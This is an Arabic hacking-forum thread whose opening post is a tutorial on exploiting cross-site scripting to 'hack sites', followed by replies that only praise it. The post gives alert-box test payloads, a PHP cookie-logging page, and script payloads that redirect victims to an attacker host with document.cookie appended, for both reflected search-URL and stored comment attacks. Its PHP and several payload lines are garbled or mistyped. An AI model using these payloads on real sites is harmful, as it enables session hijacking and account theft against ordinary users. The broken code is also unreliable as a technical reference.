1. Mr.7nsh

    Mr.7nsh Developer

    الأنتساب:
    ‏7 مارس 2013
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيفكم اخواني ان شاء الله بألف خير

    ندخل في الموضوع على طوول

    ثغرات Cross Site Scripting


    [​IMG]
    [​IMG]

    [​IMG]

    ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع :ُ{a3}:ُ؟

    ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى

    مصدرها و ادخال كود javascript أو HTML او PHP

    ما يجب ان تعرفه HTML,javascript,PHP

    اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع :ُ{ze}:ُ

    و معظم هذه الثغرات موجودة في مربعات البحث في المواقع :ُ{1u}:ُ

    مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.

    www.facebook.com/search.php?q=word

    يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".

    و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟

    [JS]http://www.facebook.com/search.php?q=<script>alert("XSS")</script>word[/JS]

    ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "

    هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS

    هذا يعني ان الموقع مصاب بثغرة XSS

    لماذا يكون الموقع مصابا بها ؟

    لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل

    #@$%^,.<>
    ليمنعو من إدخال كود javascript او HTML

    هناك نوعين من ثغرات الXSS

    النوع الدائم :

    يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .

    حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .

    <script>alert("XSS")</script>

    و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

    النوع المؤقت :
    يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم

    و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق

    http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word

    ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟

    هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS

    أهمها سرقة الكوكيز

    تحتاج الى استضافة موقع تدعم PHP

    ننشئ صفحة PHP مثال stealer.php

    تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET

    كود PHP:
     <?php
     $data
    =$_GET["c"]
     
    $f=open("cookies.tct","w")
     
    $f.write($data)
     
    $f.close()
     
    ?>
    هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي

    سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة

    مثال في الثغرات المؤقتة في طريقة البحث :

    كود PHP:
    http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
    هنا دمجنا السكريبت

    [JS]
    <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>[/JS]

    هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو

    الكوكيز عن طريق الأمر

    document.cookie

    هنا اذا فتحنا الملف

    [NEW]http://yoursite.com/cookies.txt[/NEW]
    ستجد الككيز للمستخدم مكتوبة فيها

    اما في الثغرات الدائمة فيكفي ادخال الكود

    [JS]<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>[/JS]

    ليسرق الكوكيز

    و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS

    عن طريق سكريبت
    :ُae@:
     
  2. al_98r

    al_98r Developer

    الأنتساب:
    ‏21 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    يعطيك الف عافيه على الشرح
    ما قصرت
    ابدعت
    100%
    :ُ{10}:ُ
     
  3. مجنــ قلبي ـون

    مجنــ قلبي ـون Developer

    الأنتساب:
    ‏18 يونيو 2012
    المشاركات:
    68
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الإقامة:
    قلــــiq-t34mــــــب
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    يعطيك العافية على جهدك المميز
    مشكوووور ربي يوفقك ويجزاك الخير
     
  4. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    عاشت ايدك
    شرح جميل جداً و منسق
    بارك الله بك
    {1!$8}
     
  5. !»°بہًكہًر الہًعہًراقہًي°«!

    !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм V • I • P

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    635
    الإعجابات المتلقاة:
    1,413
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    ابداع تقبل مروري
     
  6. yacine-dz

    yacine-dz Developer

    الأنتساب:
    ‏18 مايو 2015
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    والله اخي شرح روعة بس ما فهمت كتير ممكن شرح تطبيقي
     
  7. مصطفى الموسوي

    مصطفى الموسوي مشرف أختبار الأختراق مشرف

    الأنتساب:
    ‏5 ديسمبر 2014
    المشاركات:
    438
    الإعجابات المتلقاة:
    787
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    دولة امير المؤمنين
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    وعليك السلام ورحمة الله وبركاتة
    بالصراحة موضوع جيد وتنسيق رائع
    استمر في جديدك
    تحياتي
    {1!$7}​
     
  8. Hacker-X

    Hacker-X Developer

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    90
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    قطر
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    مبدع أخي بارك الله فيك
     
  9. OuT-L4w

    OuT-L4w <b><font size="4"><font color="#FF0000">Ṩ</font><f Developer

    الأنتساب:
    ‏10 ديسمبر 2011
    المشاركات:
    62
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    KeyBoard
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    الله يعافيك اخي .^
     
  10. تــــركــــي

    تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    بارك الله فيك ي بطل :{1}:​
     

مشاركة هذه الصفحة